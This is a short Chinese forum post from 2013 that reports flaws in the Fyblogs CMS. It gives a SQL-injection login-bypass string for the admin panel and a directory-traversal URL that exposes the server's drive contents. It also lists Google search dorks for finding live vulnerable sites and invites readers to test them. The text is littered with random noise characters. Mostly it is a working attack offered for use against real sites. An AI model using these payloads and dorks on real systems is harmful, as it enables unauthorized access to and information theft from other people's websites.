漏洞类型: 未授权访问/权限绕过
/ {( a: T5 [( y; d/ j2 K; Z1 f: ^+ R5 u4 `
简要描述:
7 [/ A* }# Y. E6 A' w
9 Q5 Z+ T. n7 P3 ]* e, [& Y- F5 qFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!" Y! Z, z5 w0 U4 M* r* t
6 i/ Y9 f% q% ~" x J6 J详细说明:5 \& h, Y! p6 v, Z4 E9 A( `1 ^ M
/ g7 z, P t7 P6 ~# x5 ]
后台万能密码 'or'='or'
* d& I: P" O- G, R" G& E5 X {后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!) g/ x1 X& r: I6 ^) T5 o% e
admin/uploadfile.asp?currentFolder=/upfiles/../; ]$ S4 O1 D& F0 z0 e
1 }. P/ ~6 O8 H$ d. y( u% ^& C漏洞证明:+ z6 E Y6 E7 e9 O" F
. X I3 n* x! ^6 L
谷歌:inurl:type.asp?id=1 新闻中心
4 b! U! b5 k0 w' C' o' n. D或者 :inurl:download_ok.asp?
, s0 `$ M, I9 A. ~2 r9 e
7 l; p2 y* S/ m0 c2 U可以测试2 Z/ W5 Y8 E! S% s7 e" y
7 Y! C8 M5 O& c& S6 ]- U1 E
$ u+ \9 Q6 T& w4 v# z7 d' N$ P! @ |
发表于 2013-3-7 13:07:46
收藏
支持
反对